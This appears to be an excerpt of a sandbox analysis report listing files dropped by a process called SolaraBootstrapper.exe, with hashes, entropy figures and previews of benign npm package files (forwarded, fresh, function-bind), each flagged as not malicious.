                                                  SHA-256:16A998ADF118889EEE706826B2D3BC50B0D6EF228D81EB94A64B47B72D95A398
                                                  SHA-512:64419F572A5B1D243E1A2E7CFB8CA2EEC6FA4E472311B76DCD21A0ED64E8A174C31992A06828813AADFAC230B7E23823198203BF2AF7235F73B4755BCD2DA2B1
                                                  Malicious:false
                                                  Preview:0.2.0 / 2021-05-31.==================.. * Use `req.socket` over deprecated `req.connection`..0.1.2 / 2017-09-14.==================.. * perf: improve header parsing. * perf: reduce overhead when no `X-Forwarded-For` header..0.1.1 / 2017-09-10.==================.. * Fix trimming leading / trailing OWS. * perf: hoist regular expression..0.1.0 / 2014-09-21.==================.. * Initial release.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1094
                                                  Entropy (8bit):5.1284116326456815
                                                  Encrypted:false
                                                  SSDEEP:24:0iJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:0iJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:13BABC4F212CE635D68DA544339C962B
                                                  SHA1:4881AD2EC8EB2470A7049421047C6D076F48F1DE
                                                  SHA-256:BD47CE7B88C7759630D1E2B9FCFA170A0F1FDE522BE09E13FB1581A79D090400
                                                  SHA-512:40E30174433408E0E2ED46D24373B12DEF47F545D9183B7BCE28D4DDD8C8BB528075C7F20E118F37661DB9F1BBA358999D81A14425EB3E0A4A20865DFCB53182
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2014-2017 Douglas Christopher Wilson..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,.TORT OR OTHERWISE, ARISING
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1654
                                                  Entropy (8bit):5.043298521652171
                                                  Encrypted:false
                                                  SSDEEP:48:eqXC9vRzNdXMoNjM24umPW+/+qhd7mQYAiU:9XCd15FCW+moR
                                                  MD5:5E737F1F3045F9875119CF34BF28FB03
                                                  SHA1:1970B4F2D0DD6BCEF504DF2B88A55BEA3FBB45AF
                                                  SHA-256:114E825A45563255497909DBDC6B776AE7718698896A8E66D8DC980DCD2C1088
                                                  SHA-512:CC9269857ED8E16526A8AF6C1ACE176FB5F6D41205FE9CFF02B4DB5DFAEED43237AE912AD81BC0E0F9E0AEC1A98F7F56F35771AAF9F4DA5B105B3F4C57CC9D69
                                                  Malicious:false
                                                  Preview:# forwarded..[![NPM Version][npm-image]][npm-url].[![NPM Downloads][downloads-image]][downloads-url].[![Node.js Version][node-version-image]][node-version-url].[![Build Status][ci-image]][ci-url].[![Test Coverage][coveralls-image]][coveralls-url]..Parse HTTP X-Forwarded-For header..## Installation..This is a [Node.js](https://nodejs.org/en/) module available through the.[npm registry](https://www.npmjs.com/). Installation is done using the.[`npm install` command](https://docs.npmjs.com/getting-started/installing-npm-packages-locally):..```sh.$ npm install forwarded.```..## API..```js.var forwarded = require('forwarded').```..### forwarded(req)..```js.var addresses = forwarded(req).```..Parse the `X-Forwarded-For` header from the request. Returns an array.of the addresses, including the socket address for the `req`, in reverse.order (i.e. index `0` is the socket address and the last index is the.furthest address, typically the end-user)...## Testing..```sh.$ npm test.```..## License..[M
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1578
                                                  Entropy (8bit):4.640957815478201
                                                  Encrypted:false
                                                  SSDEEP:48:uWGqkbr82Vz67qktU+w+D7KGFcjHULCR3A:uqZ2f5xAzauow
                                                  MD5:485E8B30D7F9B0394B2AC54ED51DDB06
                                                  SHA1:55BA3013D25E8273D06EC831847451D15B33FF29
                                                  SHA-256:4CA8DF355D325042545F4A522017926EC460FCB836F10174F2C80BBC4D47AA69
                                                  SHA-512:3575386A7AD542E82F655AAD66DAEDDA88430646F425492394423A67C60E48735EEDBB8EABB79A9F874AA385E1F7275CA86AB7151AE243BED737C89EA3E039C6
                                                  Malicious:false
                                                  Preview:/*!. * forwarded. * Copyright(c) 2014-2017 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module exports.. * @public. */..module.exports = forwarded../**. * Get all addresses in the request, using the `X-Forwarded-For` header.. *. * @param {object} req. * @return {array}. * @public. */..function forwarded (req) {. if (!req) {. throw new TypeError('argument req is required'). }.. // simple header parsing. var proxyAddrs = parse(req.headers['x-forwarded-for'] || ''). var socketAddr = getSocketAddr(req). var addrs = [socketAddr].concat(proxyAddrs).. // return all addresses. return addrs.}../**. * Get the socket address for a request.. *. * @param {object} req. * @return {string}. * @private. */..function getSocketAddr (req) {. return req.socket. ? req.socket.remoteAddress. : req.connection.remoteAddress.}../**. * Parse the X-Forwarded-For header.. *. * @param {string} header. * @private. */..function parse (header) {. var end = header.length. var
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1150
                                                  Entropy (8bit):4.84598824339977
                                                  Encrypted:false
                                                  SSDEEP:24:mIMNr1LxVWOXzfP61u8WCdIZCLlWecB6T+lwZKLl105P6u:mIYNVWwfS1ujCdIQUee0+qo703
                                                  MD5:E7DF15EB8D27ABEC5607F111411A9DF1
                                                  SHA1:5D558CAD52024D41373AE030C0D7FF67E8DFD7FE
                                                  SHA-256:550A78F64B6A76BC353D6A10152AF5750613D0D910F8478943176C1A6196158A
                                                  SHA-512:E589265C66CDFB98ACAE434C3A7C77236A594F3B43749A65246A6290D0771C4B5F7DFBAF0A19A37002C5B905FAF427065D4E4A3428F4D549C7CB5CD372FA09FC
                                                  Malicious:false
                                                  Preview:{. "name": "forwarded",. "description": "Parse HTTP X-Forwarded-For header",. "version": "0.2.0",. "contributors": [. "Douglas Christopher Wilson <doug@somethingdoug.com>". ],. "license": "MIT",. "keywords": [. "x-forwarded-for",. "http",. "req". ],. "repository": "jshttp/forwarded",. "devDependencies": {. "beautify-benchmark": "0.2.4",. "benchmark": "2.1.4",. "deep-equal": "1.0.1",. "eslint": "7.27.0",. "eslint-config-standard": "14.1.1",. "eslint-plugin-import": "2.23.4",. "eslint-plugin-node": "11.1.0",. "eslint-plugin-promise": "4.3.1",. "eslint-plugin-standard": "4.1.0",. "mocha": "8.4.0",. "nyc": "15.1.0". },. "files": [. "LICENSE",. "HISTORY.md",. "README.md",. "index.js". ],. "engines": {. "node": ">= 0.6". },. "scripts": {. "bench": "node benchmark/index.js",. "lint": "eslint .",. "test": "mocha --reporter spec --bail --check-leaks test/",. "test-ci": "nyc --reporter=lcov --reporter=text np
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1500
                                                  Entropy (8bit):4.803106096666345
                                                  Encrypted:false
                                                  SSDEEP:24:rfaybuDNkHl1DeYtmwv+qXPcnMR0kJsGQqyMwNMZTS:rTbgknDnd/cUHqGyfN4m
                                                  MD5:47E08786429A2F1A69B5D251E51A9D16
                                                  SHA1:0C463267A7D2F15EDE1CACBD5E326202A123208F
                                                  SHA-256:C2D714EAF4558DE25AB7EA991F52899610CD566FEC897838AD24306FA2F8F409
                                                  SHA-512:B8DD61DF9059F750DB6B44A3643F6784CA39A0BA41C16C1491240A32932A4D22AE9F88900817BBF1BD3AE1014EABA3E083734D1509CA27A3757973118281E0F6
                                                  Malicious:false
                                                  Preview:0.5.2 / 2017-09-13.==================.. * Fix regression matching multiple ETags in `If-None-Match`. * perf: improve `If-None-Match` token parsing..0.5.1 / 2017-09-11.==================.. * Fix handling of modified headers with invalid dates. * perf: improve ETag match loop..0.5.0 / 2017-02-21.==================.. * Fix incorrect result when `If-None-Match` has both `*` and ETags. * Fix weak `ETag` matching to match spec. * perf: delay reading header values until needed. * perf: skip checking modified time if ETag check failed. * perf: skip parsing `If-None-Match` when no `ETag` header. * perf: use `Date.parse` instead of `new Date`..0.4.0 / 2017-02-05.==================.. * Fix false detection of `no-cache` request directive. * perf: enable strict mode. * perf: hoist regular expressions. * perf: remove duplicate conditional. * perf: remove unnecessary boolean coercions..0.3.0 / 2015-05-12.==================.. * Add weak `ETag` matching support..0.2.4 / 2014-09-07.=====
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1174
                                                  Entropy (8bit):5.206011098331856
                                                  Encrypted:false
                                                  SSDEEP:24:JAiJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:WiJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:373C2CF0978B37E434394A43B4CBBDB4
                                                  SHA1:D45235E8D9D1D656420A760A676EA7152386969F
                                                  SHA-256:A0EC0DAB16B3666F24950F86D257930AC2AD475557B4BFE245620E0817D8A45D
                                                  SHA-512:06168D57A372AD11F29A4197232990076760DBF77F0FF0FD8292190154B5E523EB7A2DE328463C6CEF5D9A68E0D2D5C85520C26F82CDA502231260EA71A1F1B0
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2012 TJ Holowaychuk <tj@vision-media.ca>.Copyright (c) 2016-2017 Douglas Christopher Wilson <doug@somethingdoug.com>..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES O
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):3374
                                                  Entropy (8bit):4.950844818552558
                                                  Encrypted:false
                                                  SSDEEP:48:WqXC9RRYNdXMoNjGX3DkXthGqLEkfTQjbdLpb9ugUkDwWfr42RX57bowLIsMPmjO:lXCs15qcL7mbdl9U5sMPmj2WuB
                                                  MD5:2409EBA75B77A1B1258045CD372B4B6E
                                                  SHA1:D9A44594AF9E00577BF6DB57038DABD6CEED58A7
                                                  SHA-256:AE9229E6A75E3F63F9CC1F651C6E1CAFAEDCC26852AFE5FFED8A79C107B54AA5
                                                  SHA-512:3BE6E030C964CB5783A017D7452E84134EB6008C3389D0FFE79B718586BD47723BBA80FCF1BE2900A17EF5A16BB6F934BDBABCC1241486EAF08D043A0C723242
                                                  Malicious:false
                                                  Preview:# fresh..[![NPM Version][npm-image]][npm-url].[![NPM Downloads][downloads-image]][downloads-url].[![Node.js Version][node-version-image]][node-version-url].[![Build Status][travis-image]][travis-url].[![Test Coverage][coveralls-image]][coveralls-url]..HTTP response freshness testing..## Installation..This is a [Node.js](https://nodejs.org/en/) module available through the.[npm registry](https://www.npmjs.com/). Installation is done using the.[`npm install` command](https://docs.npmjs.com/getting-started/installing-npm-packages-locally):..```.$ npm install fresh.```..## API.. eslint-disable no-unused-vars -->..```js.var fresh = require('fresh').```..### fresh(reqHeaders, resHeaders)..Check freshness of the response using request and response headers...When the response is still "fresh" in the client's cache `true` is.returned, otherwise `false` is returned to indicate that the client.cache is now stale and the full response should be sent...When a client sends the `Cache-Control: no
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2711
                                                  Entropy (8bit):4.865834298886165
                                                  Encrypted:false
                                                  SSDEEP:48:CCksovsWdYvS9zjpCVxeMlOmGvXUWS/CGfOqRK9mFZx4FHUJZ:3Y3C69zlCVxeM/GvIfh86mAZ
                                                  MD5:57DBAFB6C310CE7063690F5688ACEDD5
                                                  SHA1:CFC0704230B5D08C39F9847F7E1E808369B4110E
                                                  SHA-256:85B46CE10C4FBA71FB41666586572277F626BBC698266026372941B5267BFB60
                                                  SHA-512:D8DD9A0A5ACA5D5B476D4F365F3AD999393F76592E9340219946C79BCED1BF3C019622474B829FD28AD131F540BFB3132E635D66588F44548384F696DAA227F2
                                                  Malicious:false
                                                  Preview:/*!. * fresh. * Copyright(c) 2012 TJ Holowaychuk. * Copyright(c) 2016-2017 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * RegExp to check for no-cache token in Cache-Control.. * @private. */..var CACHE_CONTROL_NO_CACHE_REGEXP = /(?:^|,)\s*?no-cache\s*?(?:,|$)/../**. * Module exports.. * @public. */..module.exports = fresh../**. * Check freshness of the response using request and response headers.. *. * @param {Object} reqHeaders. * @param {Object} resHeaders. * @return {Boolean}. * @public. */..function fresh (reqHeaders, resHeaders) {. // fields. var modifiedSince = reqHeaders['if-modified-since']. var noneMatch = reqHeaders['if-none-match'].. // unconditional request. if (!modifiedSince && !noneMatch) {. return false. }.. // Always return stale when Cache-Control: no-cache. // to support end-to-end reload requests. // https://tools.ietf.org/html/rfc2616#section-14.9.4. var cacheControl = reqHeaders['cache-control']. if (cacheControl && CACHE_CONTRO
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1357
                                                  Entropy (8bit):4.895796702793062
                                                  Encrypted:false
                                                  SSDEEP:24:rSqH1QVhxVWbeqfP6ifPVQeZWnWPKB6T+l6oOUZqy4y8e1w:rDY3VWbeqfSifPVQeQWPc0+woOUogw
                                                  MD5:193849CF18966DE2814F4F6E85740069
                                                  SHA1:6D90F7658279184066C5EE790CFA3DDE6921951B
                                                  SHA-256:65F8EBD91560A3A6143F06BD9066D337BCF5F0C53E4A5329B98894F24EEFB8B1
                                                  SHA-512:F5BF3DD3E7C630E5B7A8D4DE5068B036153958B4F6952F2A4F42B7642C04E931240CBAA9842FEB2EFB51537C6335CBB4F00D621CECC30981E64B0C04AAEF6DA6
                                                  Malicious:false
                                                  Preview:{. "name": "fresh",. "description": "HTTP response freshness testing",. "version": "0.5.2",. "author": "TJ Holowaychuk <tj@vision-media.ca> (http://tjholowaychuk.com)",. "contributors": [. "Douglas Christopher Wilson <doug@somethingdoug.com>",. "Jonathan Ong <me@jongleberry.com> (http://jongleberry.com)". ],. "license": "MIT",. "keywords": [. "fresh",. "http",. "conditional",. "cache". ],. "repository": "jshttp/fresh",. "devDependencies": {. "beautify-benchmark": "0.2.4",. "benchmark": "2.1.4",. "eslint": "3.19.0",. "eslint-config-standard": "10.2.1",. "eslint-plugin-import": "2.7.0",. "eslint-plugin-markdown": "1.0.0-beta.6",. "eslint-plugin-node": "5.1.1",. "eslint-plugin-promise": "3.5.0",. "eslint-plugin-standard": "3.0.1",. "istanbul": "0.4.5",. "mocha": "1.21.5". },. "files": [. "HISTORY.md",. "LICENSE",. "index.js". ],. "engines": {. "node": ">= 0.6". },. "scripts": {. "bench": "node benchmark/ind
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):253
                                                  Entropy (8bit):4.643130313692654
                                                  Encrypted:false
                                                  SSDEEP:6:ExL0UxNSHQyt5t+gcV7YNxxNHHWBs9QNSVLASMK8Pdsms4A:ErxN7yfjxNHH2NYMFsX
                                                  MD5:2DF142FE306FC91BF4270B4F02DF9F60
                                                  SHA1:22CE54CB7D4FC73B6C3BBDE61DBECA26BF9A66AA
                                                  SHA-256:D1EF27C0F368368A239A99363DC04D7C2DBCB9B62D1A4107390A6DC52B901F1F
                                                  SHA-512:F8FF3E8F2106D508A3E6F570E1048F1DDF55802AE4B92C8773A78B2B0859EBC4F7F4D505D3098A8630F2E43628911AF4698937047614CCF3ED65BCCC625F4D20
                                                  Malicious:false
                                                  Preview:{.."root": true,..."extends": "@ljharb",..."rules": {..."func-name-matching": 0,..."indent": [2, 4],..."no-new-func": [1],..},..."overrides": [...{...."files": "test/**",...."rules": {....."max-lines-per-function": 0,....."strict": [0]....},...},..],.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):584
                                                  Entropy (8bit):4.704323638057467
                                                  Encrypted:false
                                                  SSDEEP:12:OjjcfQWARgMqJugMJPH0FggMvS0lgM01bZBgMoGbQjgMy9gMLz4MI:qoQWAg0g+H0mgqlg7g1GegJ9gEz4D
                                                  MD5:8B5CA374A81BFABAD8ADB91C7244FA31
                                                  SHA1:86434EDEE8DBD5A90D05C58E2F680889151B43AE
                                                  SHA-256:728EFC32EE016CE1B42D6B8848548B7F3540D5E0BA2966EFCA1774D132493D52
                                                  SHA-512:BD346335C77613BF87D26C7B8EE248360034B80A61F1CE853B63A3FF8452EB645066696D54B2D4F74A9BF8C51338612696AA0977D47DA0FBB7D63E70F223382B
                                                  Malicious:false
                                                  Preview:# These are supported funding model platforms..github: [ljharb].patreon: # Replace with a single Patreon username.open_collective: # Replace with a single Open Collective username.ko_fi: # Replace with a single Ko-fi username.tidelift: npm/function-bind.community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry.liberapay: # Replace with a single Liberapay username.issuehunt: # Replace with a single IssueHunt username.otechie: # Replace with a single Otechie username.custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2'].
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):157
                                                  Entropy (8bit):4.587168296986176
                                                  Encrypted:false
                                                  SSDEEP:3:SG8xlLCKANRGEd5PWXCRVY82ARyGHGp1DmxUA61qsGpqDDC6eyg9vn:SxexNR3fVY8f0Gg1DmqosGp4DC6eX
                                                  MD5:23030733BF7C5F821E7CBFF6098811BD
                                                  SHA1:F3007F87EC7C209F84E7D64DAEB07D76E8DF1F6E
                                                  SHA-256:DD880FBE091E1B4FE671EF6E4879F7D144A64C0A3B21CE9B498C62C082FF3E50
                                                  SHA-512:B2754AC2808558A38F2D705C776677E2100F914266849CF92214504C8B8F210889B13107FBEFB80948E8C5319D01700450EF81C77D565BFBE76F4AE349140C3C
                                                  Malicious:false
                                                  Preview:# Security..Please email [@ljharb](https://github.com/ljharb) or see https://tidelift.com/security if you have a potential security vulnerability to report..
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):216
                                                  Entropy (8bit):4.771900676344982
                                                  Encrypted:false
                                                  SSDEEP:6:Kw9OfyFdRaB9yq2TpR6S8U7XfUGUiMIOJHhBK:5O6FTaB9WTpR65U7cAMjJHe
                                                  MD5:C2AB942102236F987048D0D84D73D960
                                                  SHA1:95462172699187AC02EAEC6074024B26E6D71CFF
                                                  SHA-256:948366FEA3B423A46366326D0BB2E54B08ABD1CF0B243678BA6625740C40DA5A
                                                  SHA-512:E36B20C16CEEB090750F3865EFC8D7FD983AE4E8B41C30CC3865D2FD4925BF5902627E1F1ED46C0FF2453F076EF9DE34BE899EF57754B29CD158440071318479
                                                  Malicious:false
                                                  Preview:{.."all": true,.."check-coverage": false,.."reporter": ["text-summary", "text", "html", "json"],.."lines": 86,.."statements": 85.93,.."functions": 82.43,.."branches": 76.06,.."exclude": [..."coverage",..."test"..].}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):13812
                                                  Entropy (8bit):5.309396607218774
                                                  Encrypted:false
                                                  SSDEEP:192:EgiS7nrUEmUnibLgidptekRP5AC7mQ+EpYVWgWFh/R:Ea7rUEm0ibc4qkRf+EyVWFj
                                                  MD5:3623B76F4135F25494E1AB7A9B1FCE05
                                                  SHA1:774E2641FE81D4D87FE6150FA80B9D7034524448
                                                  SHA-256:C44D3C98A0CF4F95FEF7845DA104DECA900D24853589767BBEB380406CE1DAB2
                                                  SHA-512:79D2A20F751F77F0013EB88D7675345D86FC10B82C81BC8A1CF7F7AE71323B2C747EBA1E53991360CA97A4564EF6CD114EBD7653E81665420F5151FD6DD0AE40
                                                  Malicious:false
                                                  Preview:# Changelog..All notable changes to this project will be documented in this file...The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html)...## [v1.1.2](https://github.com/ljharb/function-bind/compare/v1.1.1...v1.1.2) - 2023-10-12..### Merged..- Point to the correct file [`#16`](https://github.com/ljharb/function-bind/pull/16)..### Commits..- [Tests] migrate tests to Github Actions [`4f8b57c`](https://github.com/ljharb/function-bind/commit/4f8b57c02f2011fe9ae353d5e74e8745f0988af8).- [Tests] remove `jscs` [`90eb2ed`](https://github.com/ljharb/function-bind/commit/90eb2edbeefd5b76cd6c3a482ea3454db169b31f).- [meta] update `.gitignore` [`53fcdc3`](https://github.com/ljharb/function-bind/commit/53fcdc371cd66634d6e9b71c836a50f437e89fed).- [Tests] up to `node` `v11.10`, `v10.15`, `v9.11`, `v8.15`, `v6.16`, `v4.9`; use `nvm install-latest-npm`; run audit script in tests [`1fe8f6e`](ht
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1052
                                                  Entropy (8bit):5.099415027434423
                                                  Encrypted:false
                                                  SSDEEP:24:U6rmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5v:U6aJHlxE35QHOs5exm3ogF5v
                                                  MD5:E7417C1A8AD83F88BCAC21AD440D48B2
                                                  SHA1:290336F3DA86F5F9A91A231B058C5588AAA9F606
                                                  SHA-256:773E131A7684726005A7E4688A80B4620033BC08499BC1404DD1A1EB3BCA725E
                                                  SHA-512:0CFEF7E9352FC517CEE64D1D2866F76A66536555483ECF7EAF3D158E800DE787FDDB35D18955E6E8D5A39CA2A91347664F61237F5957F359959DDB895BB72283
                                                  Malicious:false
                                                  Preview:Copyright (c) 2013 Raynos...Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH THE SOFT
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):1755
                                                  Entropy (8bit):4.992805275903098
                                                  Encrypted:false
                                                  SSDEEP:48:F1eI4IUO2sfqtR/WG5pNPsjNZt0lMDCs+TIL0ISI1sv:XXFOv+7NLx7Y
                                                  MD5:E9CF820D7FDAACFEFA8A583A32D1BBD5
                                                  SHA1:A8DB4C2F387C42EB753011F48C5C4626D8E82635
                                                  SHA-256:305FC05A184A5AFA3766893BE87D24E4C0F2E8561B66463A51AEE4B196B1DC48
                                                  SHA-512:949896C073FFDE372377ED4BEE5FDC58CD4642F09A9D1F41577FEA520B82F291860746D46C6224BD2EDB19155561CA0FE2DADB3F24D020F9ACDA84E418471421
                                                  Malicious:false
                                                  Preview:# function-bind <sup>[![Version Badge][npm-version-svg]][package-url]</sup>..[![github actions][actions-image]][actions-url]. [![coverage][codecov-image]][codecov-url]-->.[![dependency status][deps-svg]][deps-url].[![dev dependency status][dev-deps-svg]][dev-deps-url].[![License][license-image]][license-url].[![Downloads][downloads-image]][downloads-url]..[![npm badge][npm-badge-png]][package-url]..Implementation of function.prototype.bind..Old versions of phantomjs, Internet Explorer < 9, and node < 0.6 don't support `Function.prototype.bind`...## Example..```js.Function.prototype.bind = require("function-bind").```..## Installation..`npm install function-bind`..## Contributors.. - Raynos..## MIT Licenced..[package-url]: https://npmjs.org/package/function-bind.[npm-version-svg]: https://versionbadg.es/Raynos/function-bind.svg.[deps-svg]: https://david-dm.org/Raynos/function-bind.svg.[deps-url]: https://david-dm.org/Raynos/function-bind.[dev-deps-svg]: https://david-dm.org/Raynos/fu
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2043
                                                  Entropy (8bit):4.456604868832058
                                                  Encrypted:false
                                                  SSDEEP:48:GFyJqQx6PnbMWQc3iQk/iZkzGblas0axYAN931kV:GtQ6Q2iQ2JuasXxYANoV
                                                  MD5:90FFC505F9A898A56DAB665F19BD1798
                                                  SHA1:42321136A108882E353520FFF3411FBFCB798B5B
                                                  SHA-256:5C52EB40601E0716DAFFF9759CF28D8D4AF3E2FC2E2C96384F43DBFD0F7370B5
                                                  SHA-512:E84278468B4A653E408E04836899909ED8E5C9422596D25EFF35D627F5136FAE019FFA688DD5FC85343DDBCA02E3B7A798E3F46F940CE9A6428AEC8D7C11A904
                                                  Malicious:false
                                                  Preview:'use strict';../* eslint no-invalid-this: 1 */..var ERROR_MESSAGE = 'Function.prototype.bind called on incompatible ';.var toStr = Object.prototype.toString;.var max = Math.max;.var funcType = '[object Function]';..var concatty = function concatty(a, b) {. var arr = [];.. for (var i = 0; i < a.length; i += 1) {. arr[i] = a[i];. }. for (var j = 0; j < b.length; j += 1) {. arr[j + a.length] = b[j];. }.. return arr;.};..var slicy = function slicy(arrLike, offset) {. var arr = [];. for (var i = offset || 0, j = 0; i < arrLike.length; i += 1, j += 1) {. arr[j] = arrLike[i];. }. return arr;.};..var joiny = function (arr, joiner) {. var str = '';. for (var i = 0; i < arr.length; i += 1) {. str += arr[i];. if (i + 1 < arr.length) {. str += joiner;. }. }. return str;.};..module.exports = function bind(that) {. var target = this;. if (typeof target !== 'function' || toStr.apply(target) !== funcTy
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):126
                                                  Entropy (8bit):4.472691384444496
                                                  Encrypted:false
                                                  SSDEEP:3:agWIFMZpREqQYyUcVJYREqXfvvIKzBbEbeVXKHqL6KpREqLvn:QLEbJ8EQfvvIKzBAbKXKHqL6KEMv
                                                  MD5:80C4B0103888A6175E5579DEDBAB1EA3
                                                  SHA1:F761BC101BF315E6124F737D1691AAA77E507253
                                                  SHA-256:12FA1B92429DB25599F6FE118CBBB877F7F62B83CB9BFE2FC896B2D6A8110647
                                                  SHA-512:9D0FAD8B2BA96D9488E35476F9F47CA0D81A2DD7002F8EF2EF2563F861789A6F049590B0BEF2326C2E513E9E1EBF005D71FED6F8F6CD54F91B76DE9030654F3D
                                                  Malicious:false
                                                  Preview:'use strict';..var implementation = require('./implementation');..module.exports = Function.prototype.bind || implementation;.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):2262
                                                  Entropy (8bit):4.819261067622333
                                                  Encrypted:false
                                                  SSDEEP:48:ik7R5iSZa02b6lc0ssb44tag3M9S/YsEg4PpMHYv4+xyiyxVjSQ9m:iAMcV2h0sQeL3PpMHYwOyiyx5SQ0
                                                  MD5:325C50ACB9DD3D834589C1AEB318C9A8
                                                  SHA1:1FDCD92C6AD33CFAB1C556504198E29A38759A7C
                                                  SHA-256:EDB1C4FAF4148E6E3D74ED8DBAC1A1DC359A647FF4207AAD4851396DC7A3559A
                                                  SHA-512:64B9C2664DC03826A4B03E50FE73A02C7AA28E864B537CD834DFE3F05C4E31DB32E4B3789D7BBAA531C018D9A6035407B4879EDEB9B492781989DF932E3B1B9B
                                                  Malicious:false
